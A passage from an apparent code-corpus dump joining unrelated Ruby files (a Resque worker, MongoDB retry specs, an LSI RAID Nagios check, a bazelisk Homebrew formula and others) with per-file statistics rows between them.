# memory growth as well as low level failures.
#
# It also ensures workers are always listening to signals from you,
# their master, and can react accordingly.
class Worker
include Resque::Helpers
extend Resque::Helpers
# Whether the worker should log basic info to STDOUT
attr_accessor :verbose
# Whether the worker should log lots of info to STDOUT
attr_accessor :very_verbose
# Boolean indicating whether this worker can or can not fork.
# Automatically set if a fork(2) fails.
attr_accessor :cant_fork
attr_writer :to_s
# Returns an array of all worker objects.
def self.all
Array(redis.smembers(:workers)).map { |id| find(id) }.compact
end
# Returns an array of all worker objects currently processing
# jobs.
def self.working
names = all
return [] unless names.any?
names.map! { |name| "worker:#{name}" }
reportedly_working = {}
begin
reportedly_working = redis.mapped_mget(*names).reject do |key, value|
value.nil? || value.empty?
end
rescue Redis::Distributed::CannotDistribute
names.each do |name|
value = redis.get name
reportedly_working[name] = value unless value.nil? || value.empty?
end
end
reportedly_working.keys.map do |key|
find key.sub("worker:", '')
end.compact
end
# Returns a single worker object. Accepts a string id.
def self.find(worker_id)
if exists? worker_id
queues = worker_id.split(':')[-1].split(',')
worker = new(*queues)
worker.to_s = worker_id
worker
else
nil
end
end
# Alias of `find`
def self.attach(worker_id)
find(worker_id)
end
# Given a string worker id, return a boolean indicating whether the
# worker exists
def self.exists?(worker_id)
redis.sismember(:workers, worker_id)
end
# Workers should be initialized with an array of string queue
# names. The order is important: a Worker will check the first
# queue given for a job. If none is found, it will check the
# second queue name given. If a job is found, it will be
# processed. Upon completion, the Worker will again check the
# first queue given, and so forth. In this way the queue list
# passed to a Worker on startup defines the priorities of queues.
#
# If passed a single "*", this Worker will operate on all queues
# in alphabetical order. Queues can be dynamically added or
# removed without needing to restart workers using this method.
def initialize(*queues)
@queues = queues.map { |queue| queue.to_s.strip }
validate_queues
end
# A worker must be given a queue, otherwise it won't know what to
# do with itself.
#
# You probably never need to call this.
def validate_queues
if @queues.nil? || @queues.empty?
raise NoQueueError.new("Please give each worker at least one queue.")
end
end
# This is the main workhorse method. Called on a Worker instance,
# it begins the worker life cycle.
#
# The following events occur during a worker's life cycle:
#
# 1. Startup: Signals are registered, dead workers are pruned,
# and this worker is registered.
# 2. Work loop: Jobs are pulled from a queue and processed.
# 3. Teardown: This worker is unregistered.
#
# Can be passed a float representing the polling frequency.
# The default is 5 seconds, but for a semi-active site you may
# want to use a smaller value.
#
# Also accepts a block which will be passed the job as soon as it
# has completed processing. Useful for testing.
def work(interval = 5.0, &block)
interval = Float(interval)
$0 = "resque: Starting"
startup
loop do
break if shutdown?
if not paused? and job = reserve
log "got: #{job.inspect}"
job.worker = self
run_hook :before_fork, job
working_on job
if @child = fork
srand # Reseeding
procline "Forked #{@child} at #{Time.now.to_i}"
Process.wait(@child)
else
procline "Processing #{job.queue} since #{Time.now.to_i}"
perform(job, &block)
exit! unless @cant_fork
end
done_working
@child = nil
else
break if interval.zero?
log! "Sleeping for #{interval} seconds"
procline paused? ? "Paused" : "Waiting for #{@queues.join(',')}"
sleep interval
end
end
ensure
unregister_worker
end
# DEPRECATED. Processes a single job. If none is given, it will
# try to produce one. Usually run in the child.
def process(job = nil, &block)
return unless job ||= reserve
job.worker = self
working_on job
perform(job, &block)
ensure
done_working
end
# Processes a given job in the child.
def perform(job)
begin
run_hook :after_fork, job
job.perform
rescue Object => e
log "#{job.inspect} failed: #{e.inspect}"
begin
job.fail(e)
rescue Object => e
log "Received exception when reporting failure: #{e.inspect}"
end
failed!
else
log "done: #{job.inspect}"
ensure
yield job if block_given?
end
end
# Attempts to grab a job off one of the provided queues. Returns
# nil if no job can be found.
def reserve
queues.each do |queue|
log! "Checking #{queue}"
if job = Resque.reserve(queue)
log! "Found job on #{queue}"
return job
end
end
nil
rescue Exception => e
log "Error reserving job: #{e.inspect}"
log e.backtrace.join("\n")
raise e
end
# Returns a list of queues to use when searching for a job.
# A splat ("*") means you want every queue (in alpha order) - this
# can be useful for dynamically adding new queues.
def queues
@queues.map {|queue| queue == "*" ? Resque.queues.sort : queue }.flatten.uniq
end
# Not every platform supports fork. Here we do our magic to
# determine if yours does.
def fork
@cant_fork = true if $TESTING
return if @cant_fork
begin
# IronRuby doesn't support `Kernel.fork` yet
if Kernel.respond_to?(:fork)
Kernel.fork
else
raise NotImplementedError
end
rescue NotImplementedError
@cant_fork = true
nil
end
end
# Runs all the methods needed when a worker begins its lifecycle.
def startup
enable_gc_optimizations
register_signal_handlers
prune_dead_workers
run_hook :before_first_fork
register_worker
# Fix buffering so we can `rake resque:work > resque.log` and
# get output from the child in there.
$stdout.sync = true
end
# Enables GC Optimizations if you're running REE.
# http://www.rubyenterpriseedition.com/faq.html#adapt_apps_for_cow
def enable_gc_optimizations
if GC.respond_to?(:copy_on_write_friendly=)
GC.copy_on_write_friendly = true
end
end
# Registers the various signal handlers a worker responds to.
#
# TERM: Shutdown immediately, stop processing jobs.
# INT: Shutdown immediately, stop processing jobs.
# QUIT: Shutdown after the current job has finished processing.
# USR1: Kill the forked child immediately, continue processing jobs.
# USR2: Don't process any new jobs
# CONT: Start processing jobs again after a USR2
def register_signal_handlers
trap('TERM') { shutdown! }
trap('INT') { shutdown! }
begin
trap('QUIT') { shutdown }
trap('USR1') { kill_child }
trap('USR2') { pause_processing }
trap('CONT') { unpause_processing }
rescue ArgumentError
warn "Signals QUIT, USR1, USR2, and/or CONT not supported."
end
log! "Registered signals"
end
# Schedule this worker for shutdown. Will finish processing the
# current job.
def shutdown
log 'Exiting...'
@shutdown = true
end
# Kill the child and shutdown immediately.
def shutdown!
shutdown
kill_child
end
# Should this worker shutdown as soon as current job is finished?
def shutdown?
@shutdown
end
# Kills the forked child immediately, without remorse. The job it
# is processing will not be completed.
def kill_child
if @child
log! "Killing child at #{@child}"
if system("ps -o pid,state -p #{@child}")
Process.kill("KILL", @child) rescue nil
else
log! "Child #{@child} not found, restarting."
shutdown
end
end
end
# are we paused?
def paused?
@paused
end
# Stop processing jobs after the current one has completed (if we're
# currently running one).
def pause_processing
log "USR2 received; pausing job processing"
@paused = true
end
# Start processing jobs again after a pause
def unpause_processing
log "CONT received; resuming job processing"
@paused = false
end
# Looks for any workers which should be running on this server
# and, if they're not, removes them from Redis.
#
# This is a form of garbage collection. If a server is killed by a
# hard shutdown, power failure, or something else beyond our
# control, the Resque workers will not die gracefully and therefore
# will leave stale state information in Redis.
#
# By checking the current Redis state against the actual
# environment, we can determine if Redis is old and clean it up a bit.
def prune_dead_workers
all_workers = Worker.all
known_workers = worker_pids unless all_workers.empty?
all_workers.each do |worker|
host, pid, queues = worker.id.split(':')
next unless host == hostname
next if known_workers.include?(pid)
log! "Pruning dead worker: #{worker}"
worker.unregister_worker
end
end
# Registers ourself as a worker. Useful when entering the worker
# lifecycle on startup.
def register_worker
redis.sadd(:workers, self)
started!
end
# Runs a named hook, passing along any arguments.
def run_hook(name, *args)
return unless hook = Resque.send(name)
msg = "Running #{name} hook"
msg << " with #{args.inspect}" if args.any?
log msg
args.any? ? hook.call(*args) : hook.call
end
# Unregisters ourself as a worker. Useful when shutting down.
def unregister_worker
# Multiple workers on a single machine can fail a job, causing
# duplicate retries when using retry plugin. Here we're effectively
# synchronizing on the srem call to prevent that.
if redis.srem(:workers, self)
# If we're still processing a job, make sure it gets logged as a
# failure.
if (hash = processing) && !hash.empty?
job = Job.new(hash['queue'], hash['payload'])
# Ensure the proper worker is attached to this job, even if
# it's not the precise instance that died.
job.worker = self
job.fail(DirtyExit.new)
end
end
redis.del("worker:#{self}")
redis.del("worker:#{self}:started")
Stat.clear("processed:#{self}")
Stat.clear("failed:#{self}")
end
# Given a job, tells Redis we're working on it. Useful for seeing
# what workers are doing and when.
def working_on(job)
data = encode \
:queue => job.queue,
:run_at => Time.now.strftime("%Y/%m/%d %H:%M:%S %Z"),
:payload => job.payload
redis.set("worker:#{self}", data)
end
# Called when we are done working - clears our `working_on` state
# and tells Redis we processed a job.
def done_working
processed!
redis.del("worker:#{self}")
end
# How many jobs has this worker processed? Returns an int.
def processed
Stat["processed:#{self}"]
end
# Tell Redis we've processed a job.
def processed!
Stat << "processed"
Stat << "processed:#{self}"
end
# How many failed jobs has this worker seen? Returns an int.
def failed
Stat["failed:#{self}"]
end
# Tells Redis we've failed a job.
def failed!
Stat << "failed"
Stat << "failed:#{self}"
end
# What time did this worker start? Returns an instance of `Time`
def started
redis.get "worker:#{self}:started"
end
# Tell Redis we've started
def started!
redis.set("worker:#{self}:started", Time.now.to_s)
end
# Returns a hash explaining the Job we're currently processing, if any.
def job
decode(redis.get("worker:#{self}")) || {}
end
alias_method :processing, :job
# Boolean - true if working, false if not
def working?
state == :working
end
# Boolean - true if idle, false if not
def idle?
state == :idle
end
# Returns a symbol representing the current worker state,
# which can be either :working or :idle
def state
redis.exists("worker:#{self}") ? :working : :idle
end
# Is this worker the same as another worker?
def ==(other)
to_s == other.to_s
end
def inspect
"#<Worker #{to_s}>"
end
# The string representation is the same as the id for this worker
# instance. Can be used with `Worker.find`.
def to_s
@to_s ||= "#{hostname}:#{Process.pid}:#{@queues.join(',')}"
end
alias_method :id, :to_s
# chomp'd hostname of this machine
def hostname
@hostname ||= `hostname`.chomp
end
# Returns Integer PID of running worker
def pid
Process.pid
end
# Returns an Array of string pids of all the other workers on this
# machine. Useful when pruning dead workers on startup.
def worker_pids
if RUBY_PLATFORM =~ /solaris/
solaris_worker_pids
else
linux_worker_pids
end
end
# Find Resque worker pids on Linux and OS X.
#
# Returns an Array of string pids of all the other workers on this
# machine. Useful when pruning dead workers on startup.
def linux_worker_pids
`ps -A -o pid,command | grep "[r]esque" | grep -v "resque-web"`.split("\n").map do |line|
line.split(' ')[0]
end
end
# Find Resque worker pids on Solaris.
#
# Returns an Array of string pids of all the other workers on this
# machine. Useful when pruning dead workers on startup.
def solaris_worker_pids
`ps -A -o pid,comm | grep "[r]uby" | grep -v "resque-web"`.split("\n").map do |line|
real_pid = line.split(' ')[0]
pargs_command = `pargs -a #{real_pid} 2>/dev/null | grep [r]esque | grep -v "resque-web"`
if pargs_command.split(':')[1] == " resque-#{Resque::Version}"
real_pid
end
end.compact
end
# Given a string, sets the procline ($0) and logs.
# Procline is always in the format of:
# resque-VERSION: STRING
def procline(string)
$0 = "resque-#{Resque::Version}: #{string}"
log! $0
end
# Log a message to STDOUT if we are verbose or very_verbose.
def log(message)
if verbose
puts "*** #{message}"
elsif very_verbose
time = Time.now.strftime('%H:%M:%S %Y-%m-%d')
puts "** [#{time}] #$$: #{message}"
end
end
# Logs a very verbose message to STDOUT.
def log!(message)
log message if very_verbose
end
end
end
| 29.167273 | 97 | 0.618751 |
1d60e68c3073c4db6179fcd4cccf9abb65ad162c | 1,333 | {
matrix_id: '1832',
name: 'scrs8-2b',
group: 'Meszaros',
description: 'LP sequence: scrs8-2b-4, 16, 64',
author: '',
editor: 'C. Meszaros',
date: '2004',
kind: 'linear programming problem sequence',
problem_2D_or_3D: '0',
num_rows: '1820',
num_cols: '3499',
nonzeros: '7367',
num_explicit_zeros: '0',
num_strongly_connected_components: '1',
num_dmperm_blocks: '262',
structural_full_rank: 'true',
structural_rank: '1820',
pattern_symmetry: '0.000',
numeric_symmetry: '0.000',
rb_type: 'real',
structure: 'rectangular',
cholesky_candidate: 'no',
positive_definite: 'no',
notes: 'http://www.sztaki.hu/~meszaros/public_ftp/lptestset
Converted to standard form via Resende and Veiga\'s mpsrd:
minimize c\'*x, subject to A*x=b and lo <= x <= hi
Determinisitic equivalent of stochastic LP
',
aux_fields: 'A: cell 3-by-1
b: cell 3-by-1
c: cell 3-by-1
lo: cell 3-by-1
hi: cell 3-by-1
z0: cell 3-by-1
', norm: '4.305276e+01',
min_singular_value: '5.907520e-03',
condition_number: '7.287789e+03',
svd_rank: '1820',
sprank_minus_rank: '0',
null_space_dimension: '0',
full_numerical_rank: 'yes',
image_files: 'scrs8-2b.png,scrs8-2b_dmperm.png,scrs8-2b_svd.png,scrs8-2b_graph.gif,',
}
| 29.622222 | 89 | 0.63916 |
085e98c76e424b58730facc480ba23e09da643c9 | 57 | require "spec_helper"
describe 'test template' do
end
| 8.142857 | 27 | 0.754386 |
5d51a65a297925fee3d4614dbf05613c95316d84 | 6,452 | require 'spec_helper'
describe Mongo::Retryable do
let(:klass) do
Class.new do
include Mongo::Retryable
attr_reader :cluster
attr_reader :operation
def initialize(operation, cluster)
@operation = operation
@cluster = cluster
end
def max_read_retries
cluster.max_read_retries
end
def read_retry_interval
cluster.read_retry_interval
end
def read
read_with_retry do
operation.execute
end
end
def write
write_with_retry(nil, nil) do
operation.execute
end
end
end
end
let(:operation) do
double('operation')
end
let(:cluster) do
double('cluster', next_primary: server_selector)
end
let(:server_selector) do
double('server_selector', select_server: double('server'))
end
let(:retryable) do
klass.new(operation, cluster)
end
describe '#read_with_retry' do
context 'when no exception occurs' do
before do
expect(operation).to receive(:execute).and_return(true)
end
it 'executes the operation once' do
expect(retryable.read).to be true
end
end
context 'when a socket error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::SocketError).ordered
expect(cluster).to receive(:max_read_retries).and_return(1).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.read).to be true
end
end
context 'when a socket timeout error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::SocketTimeoutError).ordered
expect(cluster).to receive(:max_read_retries).and_return(1).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.read).to be true
end
end
context 'when an operation failure occurs' do
context 'when the cluster is not a mongos' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure).ordered
expect(cluster).to receive(:sharded?).and_return(false)
end
it 'raises an exception' do
expect {
retryable.read
}.to raise_error(Mongo::Error::OperationFailure)
end
end
context 'when the cluster is a mongos' do
context 'when the operation failure is not retryable' do
let(:error) do
Mongo::Error::OperationFailure.new('not authorized')
end
before do
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
end
it 'raises the exception' do
expect {
retryable.read
}.to raise_error(Mongo::Error::OperationFailure)
end
end
context 'when the operation failure is retryable' do
let(:error) do
Mongo::Error::OperationFailure.new('no master')
end
context 'when the retry succeeds' do
before do
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
expect(cluster).to receive(:max_read_retries).and_return(1).ordered
expect(cluster).to receive(:read_retry_interval).and_return(0.1).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'returns the result' do
expect(retryable.read).to be true
end
end
context 'when the retry fails once and then succeeds' do
before do
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
expect(cluster).to receive(:max_read_retries).and_return(2).ordered
expect(cluster).to receive(:read_retry_interval).and_return(0.1).ordered
expect(operation).to receive(:execute).and_raise(error).ordered
expect(cluster).to receive(:sharded?).and_return(true)
expect(cluster).to receive(:max_read_retries).and_return(2).ordered
expect(cluster).to receive(:read_retry_interval).and_return(0.1).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'returns the result' do
expect(retryable.read).to be true
end
end
end
end
end
end
describe '#write_with_retry' do
context 'when no exception occurs' do
before do
expect(operation).to receive(:execute).and_return(true)
end
it 'executes the operation once' do
expect(retryable.write).to be true
end
end
context 'when a not master error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure.new('not master')).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.write).to be true
end
end
context 'when a not primary error occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure.new('Not primary')).ordered
expect(cluster).to receive(:scan!).and_return(true).ordered
expect(operation).to receive(:execute).and_return(true).ordered
end
it 'executes the operation twice' do
expect(retryable.write).to be true
end
end
context 'when a normal operation failure occurs' do
before do
expect(operation).to receive(:execute).and_raise(Mongo::Error::OperationFailure).ordered
end
it 'raises an exception' do
expect {
retryable.write
}.to raise_error(Mongo::Error::OperationFailure)
end
end
end
end
| 28.052174 | 115 | 0.628642 |
331c160b3fa49bd93a98f1382db140f32508b76f | 8,043 | require 'senedsa'
module Elesai; module Action
class Check
DEFAULT_SENEDSA_CONFIG_FILE = File.join(ENV['HOME'],"/.senedsa/config")
include Senedsa
def initialize(arguments,options)
@options = options.merge!({ :monitor => :nagios, :mode => :active, :diskcachepolicy => nil })
@arguments = []
@lsi = nil
opts = OptionParser.new
opts.banner = "Usage: #{ID} [options] check [check_options]"
opts.separator ""
opts.separator "Check Options"
opts.on('--hotspare MIN', Integer, "Minimum number of hotspares") { |o| @options[:hotspare] = o }
opts.on('--diskcachepolicy DISKCACHEPOLICY', String, "Disk cache policy/Disk Write Cache checks") { |o| @options[:diskcachepolicy] = o }
opts.on('-M', '--monitor [nagios]', [:nagios], "Monitoring system") { |o| @options[:monitor] = o }
opts.on('-m', '--mode [active|passive]', [:active, :passive], "Monitoring mode") { |o| @options[:mode] = o }
opts.on('-H', '--nsca_hostname HOSTNAME', String, "NSCA hostname to send passive checks") { |o| @options[:nsca_hostame] = o }
opts.on('-c', '--config CONFIG', String, "Path to Senedsa (send_nsca) configuration" ) { |o| @options[:senedsa_config] = o }
opts.on('-S', '--svc_descr SVC_DESR', String, "Nagios service description") { |o| @options[:svc_descr] = o }
opts.order!(arguments)
options_valid?
end
def exec
@lsi = LSI.new(:megacli => @options[:megacli], :fake => @options[:fake])
plugin_output = ""
plugin_status = ""
hotspare = 0
@lsi.physicaldrives.each do |id,physicaldrive|
drive_plugin_string = "[PD:#{physicaldrive._id}:#{physicaldrive[:size]}:#{physicaldrive[:mediatype]}:#{physicaldrive[:pdtype]}]"
unless physicaldrive[:firmwarestate].state == :online or physicaldrive[:firmwarestate].state == :hotspare
plugin_output += " #{drive_plugin_string}:#{physicaldrive[:firmwarestate].state}"
plugin_status = :critical if physicaldrive[:firmwarestate].state == :failed
plugin_status = :warning if physicaldrive[:firmwarestate].state == :rebuild and plugin_status != :critical
end
unless physicaldrive[:mediaerrorcount].to_i < 10
plugin_output += " #{drive_plugin_string}:MediaError:#{physicaldrive[:mediaerrorcount]}"
plugin_status = :warning if plugin_status.empty?
end
unless physicaldrive[:predictivefailurecount].to_i < 5
plugin_output += " #{drive_plugin_string}:PredictiveFailure:#{physicaldrive[:predictivefailurecount]}"
plugin_status = :warning if plugin_status.empty?
end
hotspare += 1 if physicaldrive[:firmwarestate].state == :hotspare
end
if hotspare < @options[:hotspare].to_i
plugin_status = :warning unless plugin_status == :critical
plugin_output += " hotspare low watermark (require #{@options[:hotspare]}, have #{hotspare})"
end
@lsi.virtualdrives.each do |vd|
vd_plugin_string = "[VD:#{vd._id}]"
if @options[:diskcachepolicy] and vd[:diskcachepolicy] != @options[:diskcachepolicy]
plugin_output += " #{vd_plugin_string}:diskcachepolicy is not #{@options[:diskcachepolicy]}"
plugin_status = :warning
end
case vd[:state]
when :offline, :failed
plugin_output += " #{vd_plugin_string}:#{vd[:state]}"
plugin_status = :critical
when :partially_degraded, :degraded
plugin_output += " #{vd_plugin_string}:#{vd[:state]}"
plugin_status = :warning if plugin_status != :critical
when :optimal
a = 1
else
plugin_status = :unknown
plugin_output += " #{vd_plugin_string}:#{vd[:state]}"
end
unless vd[:currentcachepolicy] =~ /^WriteBack/ and @lsi.bbus[0][:firmwarestatus][:learncycleactive] != 'Yes'
plugin_status = :warning
plugin_output += " #{vd_plugin_string}:(not in writeback mode)"
end
end
@lsi.bbus.each do |bbu|
unless bbu[:firmwarestatus][:temperature] == 'OK'
plugin_output += " [BBU:#{bbu._id}:temperature:#{bbu[:firmwarestatus][:temperature]}:#{bbu[:temperature].gsub(/\s/,'')}]"
end
unless bbu[:firmwarestatus][:learncyclestatus] == 'OK'
plugin_output += " [BBU:#{bbu._id}:learncyclestatus:#{bbu[:firmwarestatus][:learncyclestatus]}]"
plugin_status = :warning if plugin_status == ""
end
[:batterypackmissing, :batteryreplacementrequired].each do |attr|
unless bbu[:firmwarestatus][attr] == 'No'
plugin_output += " [BBU:#{attr}:#{bbu[:firmwarestatus][attr]}]"
plugin_status = :warning if plugin_status == ""
end
end
if bbu[:batterytype] == 'iBBU'
if bbu[:batterystate] != 'Operational'
plugin_output += " [BBU:#{bbu._id}:batterystate:#{bbu[:batterystate]}]"
plugin_status = :warning
else
if bbu[:firmwarestatus][:learncycleactive] == 'Yes'
plugin_output += " learn cycle enabled: [BBU:absolutestateofcharge:#{bbu[:gasgaugestatus][:absolutestateofcharge]}]"
else
unless bbu[:firmwarestatus][:voltage] == 'OK'
plugin_output += " [BBU:#{bbu._id}:voltage:#{bbu[:firmwarestatus][:voltage]}]"
plugin_status = :warning if plugin_status == ''
end
remainingcapacity = bbu[:capacityinfo][:remainingcapacity].number
designcapacity = bbu[:designinfo][:designcapacity].number
bbupercent = (remainingcapacity.to_f / designcapacity.to_f) * 100
if bbupercent < 70
plugin_output += " [BBU: #{bbupercent.to_i} percent of original capacity remaining]"
plugin_status = :warning if plugin_status == ''
end
end
end
end
end
if plugin_output.empty? and plugin_status.empty?
if @lsi.adapters.empty?
plugin_status = :warning
plugin_output = 'no adapters found'
else
@lsi.adapters.each do |adapter|
plugin_output += " [#{adapter._id}: #{adapter[:versions][:productname].gsub(/\s+/,'_')} OK]"
end
end
end
plugin_status = :ok if plugin_status.empty?
case @options[:monitor]
when :nagios
case @options[:mode]
when :active
puts "#{plugin_status.to_s.upcase}:#{plugin_output}"
exit SendNsca::STATUS[plugin_status]
when :passive
sn = SendNsca.new @options
begin
sn.send plugin_status , plugin_output
rescue SendNsca::SendNscaError => e
raise RuntimeError, "send_nsca failed: #{e.message}"
end
end
end
end
protected
def options_valid?
raise OptionParser::MissingArgument, "NSCA hostname (-H) must be specified" if @options[:nsca_hostname].nil? and @options[:mode] == 'passive'
raise OptionParser::MissingArgument, "service description (-S) must be specified" if @options[:svc_descr].nil? and @options[:mode] == 'passive'
end
def config_options?
cfg_file = nil
cfg_file = @options[:senedsa_config] unless @options[:senedsa_config].nil?
cfg_file = DEFAULT_SENEDSA_CONFIG_FILE if @options[:senedsa_config].nil? and File.readable? DEFAULT_SENEDSA_CONFIG_FILE
unless cfg_file.nil?
@options.merge!(Senedsa::SendNsca.configure(cfg_file))
@options[:senedsa_config] = cfg_file
end
end
end
end end | 44.192308 | 166 | 0.585105 |
4af58e7211d2d33b4622e8032434ee6030de6140 | 343 | require 'xml/libxml'
require 'test/unit'
class TestDeprecatedRequire < Test::Unit::TestCase
def test_basic
xp = XML::Parser.string('<ruby_array uga="booga" foo="bar"><fixnum>one</fixnum><fixnum>two</fixnum></ruby_array>')
assert_instance_of(XML::Parser, xp)
@doc = xp.parse
assert_instance_of(XML::Document, @doc)
end
end
| 28.583333 | 118 | 0.71137 |
d57beef1353a6a377978be852552667f7ccb6410 | 214 | class CreateEnglishQuizQuestions < ActiveRecord::Migration[5.1]
def change
create_table :english_quiz_questions do |t|
t.string :question
t.text :explanation
t.timestamps
end
end
end
| 19.454545 | 63 | 0.705607 |
1106a20b9104349dad7d73d461a1b2779c5f8a83 | 1,888 | class Bazelisk < Formula
desc "User-friendly launcher for Bazel"
homepage "https://github.com/bazelbuild/bazelisk/"
url "https://github.com/bazelbuild/bazelisk.git",
tag: "v1.7.5",
revision: "089a39a3f896a43e759e0b494e4acfe2982aca7e"
license "Apache-2.0"
head "https://github.com/bazelbuild/bazelisk.git"
bottle do
sha256 cellar: :any_skip_relocation, big_sur: "73266bab3d913f636851157fdc060c8ac6e1001c4dfccab5e0e84dbb94770aa8"
sha256 cellar: :any_skip_relocation, catalina: "624a6f20edb7a0f1fe6990320b87478286d721ec0fcff432671350068cb6413d"
sha256 cellar: :any_skip_relocation, mojave: "57e61c1c3fedc11a46a96e7b29cb3fdf0d77b123ac6baadfc9e24c26f4fcee83"
sha256 cellar: :any_skip_relocation, x86_64_linux: "44f0328a917bab5ac35acd0fa067f3fbfbab81789e991adc465dbec3e8149cd7"
end
depends_on "go" => :build
conflicts_with "bazel", because: "Bazelisk replaces the bazel binary"
resource "bazel_zsh_completion" do
url "https://raw.githubusercontent.com/bazelbuild/bazel/036e533/scripts/zsh_completion/_bazel"
sha256 "4094dc84add2f23823bc341186adf6b8487fbd5d4164bd52d98891c41511eba4"
end
def install
system "go", "build", *std_go_args, "-ldflags", "-X main.BazeliskVersion=#{version}"
bin.install_symlink "bazelisk" => "bazel"
resource("bazel_zsh_completion").stage do
zsh_completion.install "_bazel"
end
end
test do
ENV["USE_BAZEL_VERSION"] = Formula["bazel"].version
assert_match "Build label: #{Formula["bazel"].version}", shell_output("#{bin}/bazelisk version")
# This is an older than current version, so that we can test that bazelisk
# will target an explicit version we specify. This version shouldn't need to
# be bumped.
ENV["USE_BAZEL_VERSION"] = "0.28.0"
assert_match "Build label: 0.28.0", shell_output("#{bin}/bazelisk version")
end
end
| 40.170213 | 121 | 0.74947 |
1dfbf179927c92b34b2946c69603530b88f30750 | 780 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Tasks
module V2
VERSION = "0.3.0"
end
end
end
end
| 26.896552 | 74 | 0.730769 |
acc79c8a9d7d76dab110da628b0d748ff699898f | 957 | # frozen_string_literal: true
class API::Products::SelfAssignedController < API::BaseController
before_action :require_staff_login_for_api
def index
@target = params[:target]
@target = 'self_assigned_no_replied' unless target_allowlist.include?(@target)
@products = case @target
when 'self_assigned_all'
Product.self_assigned_product(current_user.id)
.unchecked
.list
.order_for_list
.page(params[:page])
when 'self_assigned_no_replied'
Product.self_assigned_no_replied_products(current_user.id)
.unchecked
.list
.order_for_list
.page(params[:page])
end
end
private
def target_allowlist
%w[self_assigned_no_replied self_assigned_all]
end
end
| 31.9 | 82 | 0.560084 |
1d112e80e86ebdf688d4e1dee8b58b8247e6d4c3 | 418 | class CreateCustomers < ActiveRecord::Migration
def change
create_table :customers do |t|
t.integer :company_id
t.string :first_name
t.string :last_name
t.string :email_address
t.string :phone_number
t.string :address
t.string :city
t.string :state
t.string :zip
t.boolean :published, :default => true
t.timestamps
end
end
end
| 22 | 47 | 0.619617 |
03d9109602ff875146a0e4329048eb8b9e2c74be | 297 | k1 = "Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong";
k2 = "Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping Pong Ping";
h = {k1 => 0, k2 => 0};
3000000.times{|i| k = i % 2 ? k2 : k1; h [k] = h[k] + 1}
| 59.4 | 107 | 0.659933 |
018618dd634c88f084b87368eb1f3bd0a9c6c08c | 1,003 | # -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'log_runes/version'
Gem::Specification.new do |gem|
gem.name = "log_runes"
gem.version = LogRunes::VERSION
gem.authors = ["wlipa"]
gem.email = ["[email protected]"]
gem.description = %q{Encodes session and request ids into the Rails log output using Unicode single-width characters, thereby using only a minimum amount of column width but allowing easy grepping for an individual session or request.}
gem.summary = %q{Encodes session and request ids into the Rails log output for easy grepping}
gem.homepage = ""
gem.files = `git ls-files`.split($/)
gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.require_paths = ["lib"]
gem.required_ruby_version = '>= 2.2.0' # cleaner log file rotation
end
| 45.590909 | 239 | 0.671984 |
f8903d94cec13965648f1f9b1c8c1d4095e27be9 | 1,286 | # frozen_string_literal: true
module AutoCompleteUsername
extend ActiveSupport::Concern
module ClassMethods
def attr_autocomplete_username_as(user_attr)
attribute_name = :"#{user_attr}_username"
# def second_author_username
# @second_author_username || second_author.try(:username)
# end
define_method(attribute_name) do
instance_variable_get(:"@#{attribute_name}") || send(user_attr.to_sym).try(:username)
end
# def second_author_username=(username)
# @second_author_username = username.try(:strip)
# self.second_author = @second_author_username.present? ? User.find_by_username(@second_author_username) : nil
# @second_author_username
# end
define_method(:"#{attribute_name}=") do |username|
username = username.try(:strip)
instance_variable_set(:"@#{attribute_name}", username)
send(:"#{user_attr}=", (username.present? ? User.find_by(username: username) : nil))
username
end
# transfer errors to virtual attribute
after_validation do
errors[:"#{user_attr}_id"].each { |error| errors.add(attribute_name, error) }
errors[user_attr.to_sym].each { |error| errors.add(attribute_name, error) }
end
end
end
end
| 35.722222 | 118 | 0.679627 |
ed470530d7645a362248851c7da6a8402a836f9f | 2,508 | # frozen_string_literal: true
module Crafty
module ToolStateMachine
class Tool
# @return [Proc] a block that returns the initial [Mode] for the tool.
attr_accessor :activator
# @return [Geom::BoundingBox] the bounding box containing the points of interest to the tool
attr_accessor :bounds
# @return [Array]
attr_accessor :vcb_mode
# @return [Geom::Bounds2d]
attr_accessor :drag_rect
# @yield [] a block that is called whenever the tool is activated
# @yieldreturn [Mode] the initial state for the tool
def initialize(&activator)
@activator = activator
@bounds = Geom::BoundingBox.new
@vcb_mode = Mode::NULL_VCB_STATE
@status_text = ''
@drag_rect = nil
end
# @param mode [Mode]
# @param view [Sketchup::View]
